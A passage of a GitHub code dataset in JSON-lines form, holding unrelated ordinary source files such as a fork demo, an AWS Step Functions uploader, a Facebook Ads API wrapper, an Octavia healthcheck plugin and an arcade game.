print('')\n\n","repo_name":"Artyom000123/Bot_comedian-","sub_path":"jokes_db.py","file_name":"jokes_db.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3239786182","text":"# https://school.programmers.co.kr/learn/courses/30/lessons/12931\n\nimport math\n\n\ndef solution(n):\n answer = 0\n\n while n/10 != 0:\n answer = answer+math.floor(n % 10)\n n = n/10\n\n # [실행] 버튼을 누르면 출력 값을 볼 수 있습니다.\n print('Hello Python')\n\n return answer\n","repo_name":"juwon5272/Programmers_Python","sub_path":"1week/자릿수더하기.py","file_name":"자릿수더하기.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"20064189519","text":"import os\n\ndef 
child():\n print ('A new child ', os.getpid( ))\n os._exit(0) \n\ndef parent():\n while True:\n newpid = os.fork()\n if newpid == 0:\n child()\n else:\n pids = (os.getpid(), newpid)\n print (\"parent: {}, child: {}\".format(pids[0], pids[1]))\n if input( ) == 'q': break\n\nparent()","repo_name":"terryjbates/working_with_unix_processes","sub_path":"proccesses_can_fork.py","file_name":"proccesses_can_fork.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23883572392","text":"import os \r\nimport cv2\r\nimport time\r\nimport copy\r\nimport boto3\r\nimport json\r\nimport base64 \r\nimport awsconfig\r\nimport config\r\nfrom API.captureAPI import Capture\r\nimport argparse\r\n\r\n\r\nclient = boto3.client('stepfunctions', aws_access_key_id=awsconfig.access_key, aws_secret_access_key=awsconfig.secret_access_key,region_name= awsconfig.region_name)\r\n\r\ndef main(frame):\r\n\r\n if frame is not None:\r\n\r\n print(\"Uploading.......\")\r\n \r\n model = Capture().Frame(frame)\r\n\r\n model[\"config\"] = config.config\r\n\r\n\r\n #print(json.dumps(flowModel))\r\n\r\n response = client.start_execution(\r\n stateMachineArn = awsconfig.stepfunction_ARN,\r\n input = json.dumps(model)\r\n )\r\n\r\n print(response)\r\n\r\ndef find_dir():\r\n pathlist = []\r\n\r\n path = os.getcwd()\r\n\r\n for fd in os.listdir(path):\r\n full_path=os.path.join(path,fd)\r\n if os.path.isfile(full_path):\r\n if full_path.endswith('.png') or full_path.endswith('.jpg') or full_path.endswith('.jpeg'):\r\n pathlist.append(fd)\r\n return pathlist\r\n\r\nif __name__ == '__main__':\r\n\r\n typelist = [\"jpg\",\"png\",\"jpeg\"] \r\n\r\n parser = argparse.ArgumentParser(description='2021AI_BIGDATA_Class02_Demo, Only accept 3 Type of Imagefile .jpg .jpeg .png')\r\n parser.print_help()\r\n\r\n print(\"\\nStarted......\\n\")\r\n\r\n imagelist = find_dir()\r\n\r\n print(\"The image current you can use for Recognition:\")\r\n\r\n print(imagelist,\"\\n\")\r\n\r\n while True:\r\n frame = input(\"Please Enter the File Name: \")\r\n\r\n if frame != None: \r\n if (str(frame) not in imagelist):\r\n\r\n print(\"Warning! Image not found,Please Enter the correct filename.\")\r\n else:\r\n if str(frame).split(\".\")[1] not in typelist:\r\n print(\"Warning! Image filetype incorrect.\")\r\n else:\r\n image = cv2.imread(frame)\r\n main(image)\r\n\r\n else:\r\n print(\"Warning! 
Image not found,Please Enter the correct filename.\")\r\n","repo_name":"t109598031/week1_rekognition","sub_path":"local/open/capture_image.py","file_name":"capture_image.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"32433640727","text":"#!/usr/bin/env python\nfrom requests import Session\nimport os\n\nCA = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'demoCA')\n\ncacert_path = os.path.join(CA, \"cacert.pem\")\ncert_path = os.path.join(CA, \"repository/testuser/testuser-client.pem\")\nkey_path = os.path.join(CA, \"repository/testuser/testuser-client.key\")\n\ndef http():\n uri = 'http://localhost:8080/' + os.environ.get('TEST_TARGET', '')\n s = Session()\n r = s.get(uri)\n print(\"TARGET: {}\".format(uri))\n print(\"STATUS_CODE: {}\".format(r.status_code))\n print(\"TEXT: {}\".format(r.text))\n\ndef https():\n uri = 'https://localhost:8443/' + os.environ.get('TEST_TARGET', '')\n s = Session()\n s.cert = (cert_path, key_path)\n s.headers.update({'user': 'testuser'})\n s.verify = cacert_path\n r = s.get(uri)\n print(\"TARGET: {}\".format(uri))\n print(\"STATUS_CODE: {}\".format(r.status_code))\n print(\"TEXT: {}\".format(r.text))\n\nif __name__ == \"__main__\":\n print(\"----------------------------------\")\n http()\n print(\"----------------------------------\")\n https()\n","repo_name":"kazufusa/til","sub_path":"20180423_private_ca/scripts/access-test.py","file_name":"access-test.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"25278283681","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport data\n\n# 设置字体大小\nmatplotlib.rcParams.update({'font.size': 9})\nplt.rc('font', serif='Songti SC')\n\nif __name__ == '__main__':\n data_set1 = []\n data_set2 = []\n data_set3 = []\n data_set4 = []\n data_set5 = []\n data_set6 = []\n data_set7 = []\n for index in range(1, 21):\n path1 = '../result/' + str(index) + '_1_random_search.pkl'\n path2 = '../result/' + str(index) + '_2_random_restart_hill_climbing.pkl'\n path3 = '../result/' + str(index) + '_3_simulated_annealing.pkl'\n path4 = '../result/' + str(index) + '_4_improved_genetic_algorithm.pkl'\n path5 = '../result/' + str(index) + '_5_genetic_algorithm.pkl'\n path6 = '../result/' + str(index) + '_6_particle_swarm_optimization.pkl'\n path7 = '../result/' + str(index) + '_7_immune_genetic_algorithm.pkl'\n data_set1.append(data.read_result(path1))\n data_set2.append(data.read_result(path2))\n data_set3.append(data.read_result(path3))\n data_set4.append(data.read_result(path4))\n data_set5.append(data.read_result(path5))\n data_set6.append(data.read_result(path6))\n data_set7.append(data.read_result(path7))\n\n best_v = [0 for index in range(7)]\n # 获取随机搜索算法得到的最优解\n best_v[0] = data_set1[0][1]\n for l in data_set1:\n if l[1] > best_v[0]:\n best_v[0] = l[1]\n\n # 获取随机重复爬山算法得到的最优解\n best_v[1] = data_set2[0][1]\n for l in data_set2:\n if l[1] > best_v[1]:\n best_v[1] = l[1]\n\n # 获取重复模拟退火算法得到的最优解\n best_v[2] = data_set3[0][1]\n for l in data_set3:\n if l[1] > best_v[2]:\n best_v[2] = l[1]\n\n # 获取改进遗传算法得到的最优解\n for l in data_set4:\n best_v[3] += l[len(l) - 1][0][1]\n best_v[3] /= len(data_set4)\n\n # 获取遗传算法得到的最优解\n for l in data_set5:\n best_v[4] += l[len(l) - 1][0][1]\n best_v[4] /= len(data_set5)\n\n # 获取改进遗传算法得到的最优解\n for l in data_set6:\n best_v[5] += l[len(l) - 
1][0][1]\n best_v[5] /= len(data_set6)\n\n # 获取免疫遗传算法得到的最优解\n for l in data_set7:\n best_v[6] += l[len(l) - 1][0][1]\n best_v[6] /= len(data_set7)\n\n # 输出各个算法得到的最优解\n print(np.round(best_v, 3))\n","repo_name":"oychao/paper","sub_path":"analysis/paper/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19211238763","text":"from facebookads.api import FacebookAdsApi\nfrom facebookads import objects\nfrom facebookads.api import FacebookRequest\nfrom facebookads.typechecker import TypeChecker\nfrom facebookads.adobjects.objectparser import ObjectParser\nfrom facebookads.adobjects.abstractcrudobject import AbstractCrudObject\nfrom facebookads.objects import (\n AdUser,\n Campaign,\n AdSet,\n Ad,\n AdCreative,\n AdImage,\n Insights,\n TargetingSpecsField,\n AdAccount\n)\nfrom facebookads.adobjects.adcreativelinkdata import AdCreativeLinkData\nfrom facebookads.adobjects.adcreativeobjectstoryspec import AdCreativeObjectStorySpec\nfrom facebookads.adobjects.targetinggeolocation import TargetingGeoLocation\nfrom .Exceptions import InvalidObject\nfrom . import utils\n\nclass YodaAccount(AdAccount):\n\n def __init__(self, fbid=None, parent_id=None, api=None):\n self._isYodaAccount = True\n super().__init__(fbid, parent_id, api)\n\n\n def createCampaign(self, name, spend_cap=10000):\n\n params = {\n Campaign.Field.name : name,\n Campaign.Field.status : Campaign.Status.paused,\n Campaign.Field.objective : Campaign.Objective.link_clicks,\n Campaign.Field.spend_cap : spend_cap\n }\n\n campaign = self.create_campaign(params = params)\n return campaign\n\n\n def getCampaignByName(self, name):\n allCampaigns = self.get_campaigns({Campaign.Field.name})\n campaign = None\n variasOcurrencias = False\n for camp in allCampaigns:\n if camp[Campaign.Field.name] == name:\n if campaign:\n raise LookupError(\"Hay más de una campaña con el mismo nombre\")\n campaign = camp\n return campaign\n\n\n\n def createAdSet(\n self,\n campaign, #objeto Campaign\n name,\n bid_amount,\n start_time,\n end_time, # Por defecto no terminaria\n country_code,\n daily_budget=50000,\n optimization_goal=AdSet.OptimizationGoal.link_clicks,\n status=AdSet.Status.paused,\n interests=[], #lista de objetos con id y nombre de cada interes\n age_min=None,\n age_max=None,\n genders=None\n ):\n targeting = {}\n targeting[TargetingSpecsField.geo_locations] = {\n TargetingGeoLocation.Field.countries: [country_code]\n }\n if age_max:\n targeting[TargetingSpecsField.age_max] = age_max\n if age_min:\n targeting[TargetingSpecsField.age_min] = age_min\n if genders:\n targeting[TargetingSpecsField.genders] = genders\n if interests:\n targeting[TargetingSpecsField.interests] = interests\n\n params = {}\n params[AdSet.Field.campaign_id] = campaign.get_id_assured()\n params[AdSet.Field.start_time] = start_time\n params[AdSet.Field.end_time] = end_time\n params[AdSet.Field.daily_budget] = daily_budget\n params[AdSet.Field.bid_amount] = bid_amount\n params[AdSet.Field.name] = name\n params[AdSet.Field.billing_event] = AdSet.BillingEvent.link_clicks\n params[AdSet.Field.optimization_goal] = optimization_goal\n params[AdSet.Field.status] = status\n params[AdSet.Field.targeting] = targeting\n\n response = self.create_ad_set(params=params)\n return response\n\n\n def createAdImage(self, filepath):\n image = AdImage()\n return image.api_create(parent_id=self.get_id_assured(),params={AdImage.Field.filename: filepath})\n\n\n def 
createAdCreative(self, name, imageHash, message, headline, description, caption, url, pageId):\n\n linkData = AdCreativeLinkData()\n linkData[AdCreativeLinkData.Field.message] = message\n linkData[AdCreativeLinkData.Field.link] = url\n linkData[AdCreativeLinkData.Field.caption] = caption\n linkData[AdCreativeLinkData.Field.description] = description\n linkData[AdCreativeLinkData.Field.name] = headline\n linkData[AdCreativeLinkData.Field.image_hash] = imageHash\n\n objectStorySpec = AdCreativeObjectStorySpec()\n objectStorySpec[AdCreativeObjectStorySpec.Field.page_id] = pageId\n objectStorySpec[AdCreativeObjectStorySpec.Field.link_data] = linkData\n\n params = {\n AdCreative.Field.image_hash: imageHash,\n AdCreative.Field.body: description,\n AdCreative.Field.title: headline,\n AdCreative.Field.actor_id: pageId,\n AdCreative.Field.object_story_spec: objectStorySpec,\n AdCreative.Field.name: name,\n }\n adCrea = AdCreative()\n return adCrea.api_create(parent_id=self.get_id_assured(), params=params)\n\n\n def createAd(self, name, adset, adcrea, status):\n ad = Ad()\n params = {\n Ad.Field.name: name,\n Ad.Field.adset_id: adset.get_id_assured(),\n Ad.Field.creative: adcrea,\n Ad.Field.redownload: True,\n Ad.Field.status: status\n }\n ad.api_create(parent_id=self.get_id_assured(), params=params)\n return ad\n\n\n def setSpendCap(self, spendCap):\n resp = self.api_update(params={AdAccount.Field.spend_cap: spendCap})\n return resp\n\n\n def getAccountInfo(self):\n fields = [\n AdAccount.Field.id,\n AdAccount.Field.account_id,\n AdAccount.Field.account_status,\n AdAccount.Field.amount_spent,\n AdAccount.Field.balance,\n AdAccount.Field.capabilities,\n AdAccount.Field.created_time,\n AdAccount.Field.currency,\n AdAccount.Field.disable_reason,\n AdAccount.Field.end_advertiser,\n AdAccount.Field.funding_source,\n AdAccount.Field.funding_source_details,\n AdAccount.Field.io_number,\n AdAccount.Field.min_campaign_group_spend_cap,\n AdAccount.Field.min_daily_budget,\n AdAccount.Field.name,\n AdAccount.Field.owner,\n AdAccount.Field.business,\n AdAccount.Field.partner,\n AdAccount.Field.spend_cap,\n AdAccount.Field.timezone_id,\n AdAccount.Field.timezone_name,\n AdAccount.Field.timezone_offset_hours_utc,\n AdAccount.Field.user_role\n ]\n return self.api_get(fields=fields)\n\n\n def getAdSetsRecommendations(self):\n adsets = self.get_ad_sets()\n recommendations = []\n for adset in adsets:\n recommendations.append(adset.api_get(fields={\"recommendations\"}))\n return recommendations\n\n\n def assign_user_to_ad_account(self, fields=None, params=None, batch=None, pending=False):\n param_types = {\n 'business': 'string',\n 'role': 'role_enum',\n 'user': 'string',\n }\n enums = {\n 'role_enum': [\n 'ADMIN',\n 'GENERAL_USER',\n 'REPORTS_ONLY'\n ],\n }\n request = FacebookRequest(\n node_id=self['id'],\n method='POST',\n endpoint='/userpermissions',\n api=self._api,\n param_checker=TypeChecker(param_types, enums),\n target_class=AbstractCrudObject,\n api_type='EDGE',\n response_parser=ObjectParser(target_class=AbstractCrudObject),\n )\n request.add_params(params)\n request.add_fields(fields)\n\n if batch is not None:\n request.add_to_batch(batch)\n return request\n elif pending:\n return request\n else:\n self.assure_call()\n return request.execute()\n\n\n def assignAdAccount(self, business_id):\n params = {\n 'business': business_id,\n 'role': 'ADMIN',\n 'user': utils.getCurrentAccountId()\n }\n resp = self.assign_user_to_ad_account(params=params)\n return resp\n\n\n def assignUser(self, business_id, act_id):\n 
params = {\n 'business': business_id,\n 'role': 'ADMIN',\n 'user': act_id\n }\n resp = self.assign_user_to_ad_account(params=params)\n return resp\n\n\n def getCampaignInsights(self, campaign):\n params = {\n 'date_preset': Campaign.DatePreset.last_7_days,\n 'fields': [Insights.Field.impressions, Insights.Field.ad_id, Insights.Field.cpc, Insights.Field.objective ]\n }\n fields = [\n 'campaign_name',\n 'adset_name',\n 'adset_id',\n 'impressions',\n 'website_clicks',\n 'app_store_clicks',\n 'deeplink_clicks',\n 'spend',\n 'reach',\n 'actions',\n 'action_values'\n ]\n return campaign.get_insights(params=params, fields=fields)","repo_name":"bertucho/facebook-ads-wrapper","sub_path":"YodaAccount.py","file_name":"YodaAccount.py","file_ext":"py","file_size_in_byte":8782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"75273485924","text":"import datetime\n\nfrom oslo_config import cfg\nfrom oslo_middleware.healthcheck import pluginbase\n\nfrom octavia.db import api as db_apis\nfrom octavia.db import healthcheck\n\nCONF = cfg.CONF\n\n\nclass OctaviaDBHealthcheck(pluginbase.HealthcheckBaseExtension):\n\n UNAVAILABLE_REASON = 'The Octavia database is unavailable.'\n\n last_check = None\n last_result = None\n last_message = None\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def healthcheck(self, server_port):\n try:\n if (self.last_check is not None and\n ((datetime.datetime.now() -\n self.last_check).total_seconds()) <\n CONF.api_settings.healthcheck_refresh_interval):\n result = self.last_result\n message = self.last_message\n else:\n session = db_apis.get_session()\n with session.begin():\n result, message = healthcheck.check_database_connection(\n session)\n self.last_check = datetime.datetime.now()\n self.last_result = result\n self.last_message = message\n if result:\n return OctaviaDBCheckResult(available=True, reason=\"OK\")\n else:\n return OctaviaDBCheckResult(available=False,\n reason=self.UNAVAILABLE_REASON,\n details=message)\n except Exception as e:\n return OctaviaDBCheckResult(available=False,\n reason=self.UNAVAILABLE_REASON,\n details=str(e))\n\n\nclass OctaviaDBCheckResult(pluginbase.HealthcheckResult):\n \"\"\"Result sub-class to provide a unique name in detail reports.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n","repo_name":"openstack/octavia","sub_path":"octavia/api/healthcheck/healthcheck_plugins.py","file_name":"healthcheck_plugins.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":160,"dataset":"github-code","pt":"52"} +{"seq_id":"8185889268","text":"def generator(n) :\n for i in range(0, n) :\n yield i ** 2 \n\nn = int(input(\"Write number\"))\nfor x in generator(n) :\n print(x)\n\n\n\n\n\n\n\n\n\n# number = int(input(\"Write number: \"))\n# even_n = [i for i in range(number) if i%2==0]\n# print(\"All even numbers up to {}\".format(number))\n# print(*even_n,sep =\", \")","repo_name":"NuraKunanbaev/-pp2-22B030491","sub_path":"TSIS4/generators/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17260752042","text":"from heapq import heappop, heappush\n\ndy = [-1, 0, 1, 0]\ndx = [0, 1, 0, -1]\n\ndef result():\n my_max = 0\n for y in range(M):\n if 0 in farm[y]:\n return -1\n my_max = max([my_max]+ farm[y])\n return my_max-1\n\nN, M = map(int, input().split())\nfarm 
= [list(map(int, input().split())) for _ in range(M)]\n\nh = []\nans = 0\nfor y in range(M):\n    for x in range(N):\n        if farm[y][x] == 1:\n            heappush(h, (1, y, x))\n\nwhile h:\n    n, y, x = heappop(h)\n    for d in range(4):\n        my = y + dy[d]\n        mx = x + dx[d]\n        if 0<=my<M and 0<=mx<N and (farm[my][mx] > n+1 or not farm[my][mx]):\n            farm[my][mx] = n+1\n            heappush(h, (n+1, my, mx))\n\n\nprint(result())","repo_name":"Gwanghun-Im/BAEKJOON","sub_path":"210518/7576.py","file_name":"7576.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"40260841331","text":"\"\"\" Lab 7 - User Control \"\"\"\n\nimport arcade\n\n# --- Constants ---\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\nMOVEMENT_SPEED = 5\n\n# lilypad drawing function\n\ndef lilypad(x, y):\n    # lilypad\n    arcade.draw_ellipse_filled(x, y, 300, 300, arcade.color.DARK_GREEN)\n    arcade.draw_triangle_filled(x, 30 + y, -50 + x, 150 + y, 50 + x, 150 + y, arcade.csscolor.DARK_BLUE)\n\n# tadpole drawing function\n\ndef tadpole(x, y):\n    arcade.draw_ellipse_filled(x, -60 + y, 40, 90, arcade.color.GRAY)\n    arcade.draw_ellipse_filled(x, -60 + y, 20, 70, arcade.color.BLACK)\n    arcade.draw_ellipse_filled(x, y, 50, 70, arcade.color.BLACK)\n\n# dragonfly drawing function\n\ndef dragonfly(x, y):\n    arcade.draw_ellipse_filled(-40 + x, 45 + y, 75, 20, arcade.csscolor.GRAY, tilt_angle=20)\n    arcade.draw_ellipse_filled(-40 + x, 15 + y, 75, 20, arcade.csscolor.GRAY, tilt_angle=-20)\n    arcade.draw_ellipse_filled(40 + x, 15 + y, 75, 20, arcade.csscolor.GRAY, tilt_angle=20)\n    arcade.draw_ellipse_filled(40 + x, 45 + y, 75, 20, arcade.csscolor.GRAY, tilt_angle=-20)\n    arcade.draw_ellipse_filled(x, y, 20, 120, arcade.csscolor.BLACK)\n    arcade.draw_ellipse_filled(x, 60 + y, 24, 24, arcade.csscolor.BLACK)\n\n# Dragonfly class\n\nclass Dragonfly:\n    def __init__(self, position_x, position_y, color):\n        self.position_x = position_x\n        self.position_y = position_y\n        self.color = color\n\n    def draw(self):\n        arcade.draw_ellipse_filled(-40 + self.position_x, 45 + self.position_y, 75, 20, arcade.csscolor.GRAY,\n                                   tilt_angle=20)\n        arcade.draw_ellipse_filled(-40 + self.position_x, 15 + self.position_y, 75, 20, arcade.csscolor.GRAY,\n                                   tilt_angle=-20)\n        arcade.draw_ellipse_filled(40 + self.position_x, 15 + self.position_y, 75, 20, arcade.csscolor.GRAY,\n                                   tilt_angle=20)\n        arcade.draw_ellipse_filled(40 + self.position_x, 45 + self.position_y, 75, 20, arcade.csscolor.GRAY,\n                                   tilt_angle=-20)\n        arcade.draw_ellipse_filled(self.position_x, self.position_y, 20, 120, self.color)\n        arcade.draw_ellipse_filled(self.position_x, 60 + self.position_y, 24, 24, self.color)\n\n# Tadpole class\n\nclass Tadpole:\n    def __init__(self, position_x, position_y, change_x, change_y, width, height, color):\n        # Take the parameters of the init function above,\n        # and create instance variables out of them.\n        self.position_x = position_x\n        self.position_y = position_y\n        self.change_x = change_x\n        self.change_y = change_y\n        self.width = width\n        self.height = height\n        self.color = color\n\n        self.border_sound = arcade.load_sound(\":resources:sounds/hurt3.wav\")\n        self.border_sound_player = None\n\n    # Drawing function with class parameters\n\n    def draw(self):\n\n        arcade.draw_ellipse_filled(self.position_x, -60 + self.position_y, self.width + -10, self.height + 20,\n                                   arcade.color.GRAY)\n        arcade.draw_ellipse_filled(self.position_x, -60 + self.position_y, self.width + -30, self.height,\n                                   self.color)\n        arcade.draw_ellipse_filled(self.position_x, self.position_y, self.width, 
self.height, self.color)\n\n def play(self):\n if not self.border_sound_player or not self.border_sound_player.playing:\n self.border_sound_player = arcade.play_sound(self.border_sound)\n\n #\n def update(self):\n self.position_y += self.change_y\n self.position_x += self.change_x\n\n if self.position_x < 0:\n self.position_x = 0\n self.play()\n\n if self.position_x > SCREEN_WIDTH:\n self.position_x = SCREEN_WIDTH\n self.play()\n\n if self.position_y < 0:\n self.position_y = 0\n self.play()\n\n if self.position_y > SCREEN_HEIGHT:\n self.position_y = SCREEN_HEIGHT\n self.play()\n\n\nclass MyGame(arcade.Window):\n \"\"\" Our Custom Window Class\"\"\"\n\n def __init__(self):\n \"\"\" Initializer \"\"\"\n\n # Call the parent class initializer\n super().__init__(SCREEN_WIDTH, SCREEN_HEIGHT, \"Lab 7 - User Control\")\n\n self.set_mouse_visible(False)\n\n arcade.set_background_color(arcade.csscolor.DARK_BLUE)\n\n self.click_sound = arcade.load_sound(\":resources:sounds/coin5.wav\")\n\n self.tadpole = Tadpole(200, 200, 0, 0, 50, 70, arcade.csscolor.BLACK)\n self.dragonfly = Dragonfly(400, 400, arcade.csscolor.BLACK)\n\n def update(self, delta_time):\n self.tadpole.update()\n\n def on_key_press(self, key, modifiers):\n \"\"\" Called whenever the user presses a key. \"\"\"\n if key == arcade.key.LEFT:\n self.tadpole.change_x = -MOVEMENT_SPEED\n elif key == arcade.key.RIGHT:\n self.tadpole.change_x = MOVEMENT_SPEED\n elif key == arcade.key.UP:\n self.tadpole.change_y = MOVEMENT_SPEED\n elif key == arcade.key.DOWN:\n self.tadpole.change_y = -MOVEMENT_SPEED\n\n def on_key_release(self, key, modifiers):\n \"\"\" Called whenever a user releases a key. \"\"\"\n if key == arcade.key.LEFT or key == arcade.key.RIGHT:\n self.tadpole.change_x = 0\n elif key == arcade.key.UP or key == arcade.key.DOWN:\n self.tadpole.change_y = 0\n\n def on_mouse_press(self, x, y, button, modifiers):\n \"\"\" Called when the user presses a mouse button. 
\"\"\"\n\n if button == arcade.MOUSE_BUTTON_LEFT:\n arcade.play_sound(self.click_sound)\n elif button == arcade.MOUSE_BUTTON_RIGHT:\n arcade.play_sound(self.click_sound)\n\n def on_draw(self):\n\n arcade.start_render()\n lilypad(450, 700)\n lilypad(200, 400)\n lilypad(500, 100)\n self.tadpole.draw()\n self.dragonfly.draw()\n\n def on_mouse_motion(self, x, y, dx, dy):\n \"\"\" Called to update our objects.\n Happens approximately 60 times per second.\"\"\"\n self.dragonfly.position_x = x\n self.dragonfly.position_y = y\n\n\ndef main():\n MyGame()\n arcade.run()\n\n\nmain()\n","repo_name":"ef2025/learn-arcade-work","sub_path":"Lab 07 - User Control/lab_07.py","file_name":"lab_07.py","file_ext":"py","file_size_in_byte":6138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"32985219671","text":"import logging\nfrom typing import Dict\nfrom typing import List\n\nimport boto3\nimport neo4j\n\nfrom .util import get_botocore_config\nfrom cartography.util import aws_handle_regions\nfrom cartography.util import run_cleanup_job\nfrom cartography.util import timeit\n\nlogger = logging.getLogger(__name__)\n\n\n@timeit\n@aws_handle_regions\ndef get_ec2_auto_scaling_groups(boto3_session: boto3.session.Session, region: str) -> List[Dict]:\n client = boto3_session.client('autoscaling', region_name=region, config=get_botocore_config())\n paginator = client.get_paginator('describe_auto_scaling_groups')\n asgs: List[Dict] = []\n for page in paginator.paginate():\n asgs.extend(page['AutoScalingGroups'])\n return asgs\n\n\n@timeit\n@aws_handle_regions\ndef get_launch_configurations(boto3_session: boto3.session.Session, region: str) -> List[Dict]:\n client = boto3_session.client('autoscaling', region_name=region, config=get_botocore_config())\n paginator = client.get_paginator('describe_launch_configurations')\n lcs: List[Dict] = []\n for page in paginator.paginate():\n lcs.extend(page['LaunchConfigurations'])\n return lcs\n\n\n@timeit\ndef load_launch_configurations(\n neo4j_session: neo4j.Session, data: List[Dict], region: str, current_aws_account_id: str, update_tag: int,\n) -> None:\n ingest_lc = \"\"\"\n UNWIND $launch_configurations as lc\n MERGE (config:LaunchConfiguration{id: lc.LaunchConfigurationARN})\n ON CREATE SET config.firstseen = timestamp(), config.name = lc.LaunchConfigurationName,\n config.arn = lc.LaunchConfigurationARN,\n config.created_time = lc.CreatedTime\n SET config.lastupdated = $update_tag, config.image_id = lc.ImageId,\n config.key_name = lc.KeyName,\n config.security_groups = lc.SecurityGroups,\n config.instance_type = lc.InstanceType,\n config.kernel_id = lc.KernelId,\n config.ramdisk_id = lc.RamdiskId,\n config.instance_monitoring_enabled = lc.InstanceMonitoring.Enabled,\n config.spot_price = lc.SpotPrice,\n config.iam_instance_profile = lc.IamInstanceProfile,\n config.ebs_optimized = lc.EbsOptimized,\n config.associate_public_ip_address = lc.AssociatePublicIpAddress,\n config.placement_tenancy = lc.PlacementTenancy,\n config.region=$Region\n WITH config\n MATCH (aa:AWSAccount{id: $AWS_ACCOUNT_ID})\n MERGE (aa)-[r:RESOURCE]->(config)\n ON CREATE SET r.firstseen = timestamp()\n SET r.lastupdated = $update_tag\n \"\"\"\n for lc in data:\n lc['CreatedTime'] = str(int(lc['CreatedTime'].timestamp()))\n\n neo4j_session.run(\n ingest_lc,\n launch_configurations=data,\n AWS_ACCOUNT_ID=current_aws_account_id,\n Region=region,\n update_tag=update_tag,\n )\n\n\n@timeit\ndef load_ec2_auto_scaling_groups(\n neo4j_session: neo4j.Session, data: 
List[Dict], region: str, current_aws_account_id: str, update_tag: int,\n) -> None:\n ingest_group = \"\"\"\n UNWIND $autoscaling_groups_list as ag\n MERGE (group:AutoScalingGroup{arn: ag.AutoScalingGroupARN})\n ON CREATE SET group.firstseen = timestamp(),\n group.createdtime = ag.CreatedTime\n SET group.launchconfigurationname = ag.LaunchConfigurationName,\n group.launchtemplatename = ag.LaunchTemplate.LaunchTemplateName,\n group.launchtemplateid = ag.LaunchTemplate.LaunchTemplateId,\n group.launchtemplateversion = ag.LaunchTemplate.Version,\n group.maxsize = ag.MaxSize, group.minsize = ag.MinSize, group.defaultcooldown = ag.DefaultCooldown,\n group.desiredcapacity = ag.DesiredCapacity, group.healthchecktype = ag.HealthCheckType,\n group.healthcheckgraceperiod = ag.HealthCheckGracePeriod, group.status = ag.Status,\n group.newinstancesprotectedfromscalein = ag.NewInstancesProtectedFromScaleIn,\n group.maxinstancelifetime = ag.MaxInstanceLifetime, group.capacityrebalance = ag.CapacityRebalance,\n group.name = ag.AutoScalingGroupName,\n group.lastupdated = $update_tag,\n group.region=$Region\n WITH group\n MATCH (aa:AWSAccount{id: $AWS_ACCOUNT_ID})\n MERGE (aa)-[r:RESOURCE]->(group)\n ON CREATE SET r.firstseen = timestamp()\n SET r.lastupdated = $update_tag\n \"\"\"\n\n ingest_vpc = \"\"\"\n UNWIND $vpc_id_list as vpc_id\n MERGE (subnet:EC2Subnet{subnetid: vpc_id})\n ON CREATE SET subnet.firstseen = timestamp()\n SET subnet.lastupdated = $update_tag\n WITH subnet\n MATCH (group:AutoScalingGroup{arn: $GROUPARN})\n MERGE (subnet)<-[r:VPC_IDENTIFIER]-(group)\n ON CREATE SET r.firstseen = timestamp()\n SET r.lastupdated = $update_tag\n \"\"\"\n\n ingest_instance = \"\"\"\n UNWIND $instances_list as i\n MERGE (instance:Instance:EC2Instance{id: i.InstanceId})\n ON CREATE SET instance.firstseen = timestamp()\n SET instance.lastupdated = $update_tag, instance.region=$Region\n WITH instance\n MATCH (group:AutoScalingGroup{arn: $GROUPARN})\n MERGE (instance)-[r:MEMBER_AUTO_SCALE_GROUP]->(group)\n ON CREATE SET r.firstseen = timestamp()\n SET r.lastupdated = $update_tag\n WITH instance\n MATCH (aa:AWSAccount{id: $AWS_ACCOUNT_ID})\n MERGE (aa)-[r:RESOURCE]->(instance)\n ON CREATE SET r.firstseen = timestamp()\n SET r.lastupdated = $update_tag\n \"\"\"\n\n ingest_lts = \"\"\"\n UNWIND $autoscaling_groups_list as ag\n MATCH (group:AutoScalingGroup{arn: ag.AutoScalingGroupARN})\n MATCH (template:LaunchTemplate{id: ag.LaunchTemplate.LaunchTemplateId})\n MERGE (group)-[r:HAS_LAUNCH_TEMPLATE]->(template)\n ON CREATE SET r.firstseen = timestamp()\n SET r.lastupdated = $update_tag\n \"\"\"\n\n ingest_lcs = \"\"\"\n UNWIND $autoscaling_groups_list as ag\n MATCH (group:AutoScalingGroup{arn: ag.AutoScalingGroupARN})\n MATCH (config:LaunchConfiguration{name: ag.LaunchConfigurationName})\n MERGE (group)-[r:HAS_LAUNCH_CONFIG]->(config)\n ON CREATE SET r.firstseen = timestamp()\n SET r.lastupdated = $update_tag\n \"\"\"\n\n launch_configs = []\n launch_templates = []\n for group in data:\n if group.get('LaunchConfigurationName'):\n launch_configs.append(group)\n if group.get('LaunchTemplate'):\n launch_templates.append(group)\n\n group['CreatedTime'] 